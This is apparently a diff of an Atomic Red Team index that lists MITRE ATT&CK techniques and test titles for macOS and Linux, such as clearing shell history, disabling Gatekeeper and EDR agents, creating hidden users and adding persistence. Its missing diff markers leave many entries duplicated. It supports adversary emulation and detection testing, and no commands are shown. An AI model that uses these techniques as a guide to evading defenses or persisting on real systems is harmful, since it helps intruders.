- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
@@ -148,42 +127,33 @@
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- [T1070.002 Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.004 Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- T1562.004 Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.004 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.004 Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #5: Disable Carbon Black Response [macos]
- Atomic Test #6: Disable LittleSnitch [macos]
- Atomic Test #7: Disable OpenDNS Umbrella [macos]
- Atomic Test #8: Disable macOS Gatekeeper [macos]
- Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- Atomic Test #2: Mac Hidden file [macos]
@@ -193,20 +163,17 @@
- [T1564.002 Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #3: Install root CA on macOS [macos]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.002 Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [macos, linux]
@@ -217,26 +184,21 @@
- Atomic Test #7: chown - Change file or folder mode ownership only [macos, linux]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.003 Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.003 Rename System Utilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
@@ -245,75 +207,71 @@
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- [T1036.006 Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Space After Filename [macos]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.002 Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
@@ -325,13 +283,13 @@
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #1: Network Share Discovery [macos, linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #7: Examine password policy - macOS [macos]
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -347,137 +305,65 @@
- Atomic Test #2: System Information Discovery [macos]
- Atomic Test #3: List OS Information [linux, macos]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- T1614.001 System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #8: List macOS Firewall Rules [macos]
- Atomic Test #6: List macOS Firewall Rules [macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
